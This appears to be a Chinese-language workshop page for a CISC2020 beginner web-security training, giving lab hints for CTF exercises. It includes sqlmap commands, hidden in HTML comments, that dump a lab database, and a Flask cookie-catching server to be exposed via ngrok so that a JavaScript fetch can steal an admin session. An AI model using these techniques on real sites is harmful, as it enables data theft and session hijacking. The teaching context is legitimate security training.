# CISC2020 - Web Training :::success 主題 : <font color=red>基礎</font>網頁安全演練 >[name=MacacaHub] ::: ![](https://cisc2020.ccisa.org.tw/CISC2020_practice_web.jpg) ## Lab ### [MacacaHub-WebTraining](https://ctf.macacahub.tw) > 用 NSYSU wifi 可能會連不上,可以的話請自備網路 > 不行的話我們會開網路分享QwQ --- ## Section 01 基本網頁概論 ### [slide 投影片點我><](https://drive.google.com/file/d/1pTlwgimESkYohAHlPzEcyN8BrvzSoNxL/view?usp=sharing) ### Q&A - [x] Q.1 請問投影片會給嗎? > 給啦,哪次不給。 > [name=yctseng][color=#B5E853] - [x] Q.2 只要你懂網站 網站就會幫助你 > ??? > [name=yctseng][color=#B5E853] - [x] Q.3 cfh 阿我就怕被罵啊 - [ ] Q.4 ## Section 02 網站資訊收集 ### [slide 投影片點我><](https://drive.google.com/file/d/1KxtzKjzevmpmRMDWI6ii3_MIpSRo4dZi/view?usp=sharing) ### Q&A - [ ] Q. \csy教我/ ### Lab Hint #### Spider Block - /robots.txt 好像有什麼東西... - 人就喜歡做壞壞的事 看到disallow當然要戳一下啊 #### Version Control - /.git 欸? 居然是 forbidden (error 403) 講師好像有介紹過什麼工具... GitHacker? - 還有 到底什麼是 git ? 該如何還原紀錄呢>< <!--$ git checkout [version]--> > hint: 如果是第一次接觸的同學,可以瞭解一下git,另外GitHacker有些python套件可能也需要研究一下 (e.g. requests) > [name=yctseng][color=#B5E853] > 幫分享,老鐵們快來撿裝甲包:https://www.jianshu.com/p/0ea09975169d > 挖 樓上看起來黑黑的,好害怕>q< > [name=yctseng][color=#B5E853] #### Wordpress - !!! 我偷偷用了講師介紹的 **Wappalyzer套件** 看到網站好像是用wordpress架的 - 嗯 既然知道wordpress,好像有個後台登入介面叫做 /wp-admin - 可是好像沒有帳號,該怎麼辦呢QwQ ## Section 03 注入攻擊與防禦 ### [slide 投影片點我><](https://drive.google.com/file/d/1D4JJqH6oAMWSSWYqc8ErEHpBowTlD7pB/view?usp=sharing) ### Q&A - [ ] Q. 請問有人在這裡問問題嗎? > 沒有QwQ > [name=yctseng][color=#B5E853] ### Lab Hint #### News - 雖然還沒開始上課,不過我剛剛好像偷偷聽到了什麼 sqlmap 🧐🧐🧐 > hint: sqlmap 的使用案例參考 https://ssorc.tw/7641/sql-注入-sqlmap-弱點測試/ > [name=yctseng][color=#B5E853] <!-- $ sqlmap -u https://lab3-2.macacahub.tw/new.php\?id\=1 --dbs $ sqlmap -u https://lab3-2.macacahub.tw/new.php\?id\=1 -D newsdb --tables $ sqlmap -u https://lab3-2.macacahub.tw/new.php\?id\=1 -D newsdb --tables --dump FLAGS --> #### Error Message - 又是登入頁面...唉 - 欸幹等等 怎麼user/user就登入了,還要我講笑話???? - (輸入) 「館長參加原住民抽獎」 ... not funny ????????? > hint: https://lab3-1.macacahub.tw/login.php > 輸入錯的帳號密碼,可以看到??? > [name=stavhaygn][color=#B5E853] ```python= from flask import Flask, request from flask_cors import CORS #接收來自不同domain的request app = Flask(__name__) CORS(app) @app.route('/') def index(): cookie = request.args.get('c', None) if cookie: return cookie return 'Test' if __name__ == '__main__': app.run(host='0.0.0.0', port=1234) ``` > Hint: 透過上面的code只能在我們本機端架出一個網站(127.0.0.1) > 可以利用 [ngrok](https://ngrok.com/download) 暫時幫我們在外開一個public ip幫我們接收這一題的session > [name=yctseng][color=#B5E853] 拼出Javasript來撈admin session, e.g. JS fetch https://developer.mozilla.org/zh-TW/docs/Web/API/Fetch_API/Using_Fetch ![](https://i.imgur.com/Rq8KwXK.jpg) ![](https://i.imgur.com/p0OXki0.jpg =200x) <style> .navbar-brand > span.hidden-xs { color: transparent; } .navbar-brand > span.hidden-xs:after { margin-left: -3.8em; content: 'MacacaHub Web Training'; color: #4b4645; } .navbar-brand > .fa-file-text { display: none; } </style>